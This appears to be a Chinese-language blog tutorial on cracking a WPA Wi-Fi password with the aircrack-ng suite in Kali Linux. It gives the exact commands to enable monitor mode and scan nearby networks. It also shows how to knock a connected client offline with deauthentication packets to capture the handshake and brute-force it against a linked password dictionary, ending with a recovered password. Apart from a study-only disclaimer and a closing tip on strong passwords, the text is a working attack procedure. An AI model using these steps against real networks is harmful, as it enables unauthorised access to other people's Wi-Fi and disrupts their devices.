[RainBowText]此文章仅做学习交流,请自觉遵守法律法规。[/RainBowText]
1) vmware 2) kali linux虚拟机 3) 支持监听的无线网卡
插入无线网卡
-点击vmware菜单栏
的虚拟机
-可移动设备
-选择无线网卡
,并连接。
打开kali
,打开终端
-输入ifconfig
,显示wlan0
网口,表示无线网卡
接入成功。
设置网卡监听模式
airmon-ng start wlan0
再次输入ipconfig
,此时网卡wlan0变为wlan0mon
1) 扫描周围的wifi信号
airodump-ng wlan0mon
BSSID是ap(access point)的mac地址,在这里ap为路由器。 PWR代表信号水平,信号只越高说明距离越近,但是注意,-1值说明无法监听。 CH表示工作的信道号 ENC表示算法加密体系 CIPHER表示检测到的加密算法 AUTH表示认证协议 ESSID即ssid号,wifi的名称 STSTION表示客户端的mac地址(ctrl-c停止扫描) 2) 抓取握手包 airodump-ng -c 1 --ivs -w test --bssid 30:FC:xx:42:41:D6 wlan0mon
参数详解:
-c 选取信道号(扫描wifi时CH栏的值) --ivs -w test 保存ivs格式的包(这里名称为test ) --bssid 要破解ap的ssid(扫描时BSSID栏的mac地址) 最后是使用的网卡名
[RainBowText]注意:[/RainBowText]
这里抓取的数据包,是连接wifi时的认证包,所以当抓取时没有设备连接,就抓不到这个数据包。
这里利用aireplay-ng
工具,强制用户断开wifi
原理:
aireplay-ng
工具给连接到此wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。
aireplay-ng
的生效前提是,wifi网络中至少有一个连接的设备。从上图可以看到哪些设备连接到了wifi,STATION就是连接设备的MAC地址,记住一个。
3) 发送反认证包(再开一个终端)
aireplay-ng -0 10 -a 30:FC:xx:42:41:D6-c 90:F0:xx:70:F7:13 wlan0mon
参数详解:
-0 指定反认证包的个数 -a 指定wifi网关的mac地址 -c 指定强制断开的设备
[RainBowText]注:反认证时,要持续抓取数据包,当出现下图红框的内容时(mac地址是wifi网关的mac地址),说明抓取认证包成功。[/RainBowText]
4) ls
查看是否抓取成功
这里的test-01.ivs
到test-05.ivs
就是抓取的数据包
5) 破解wifi数据包
这里分享几个wifi字典
此处内容需要评论回复后(审核通过)方可阅读。
">https://gitee.com/r3387/wenyu/raw/master/%E7%A0%B4%E8%A7%A3wifi/passwd.zip[/hide]
aircrack-ng -w paswd.txt test-01.ivs
参数详解:
-w 指定密码字典 最后是wifi数据包(这几个包可能有的不含认证包,所以每个包都试一下)
这里,跑到了密码为369369++..
尝试连接成功。。。。。
关闭无线网卡的监听模式
airmon-ng stop wlan0mon
[RainBowText]注: 这里破解成功的几率完全靠密码字典强大程度,如果字典里没有真正的密码,那是肯定跑不出来的。所以在公共场合或在家里,设置wifi密码强度一定要高,以免黑阔被利用。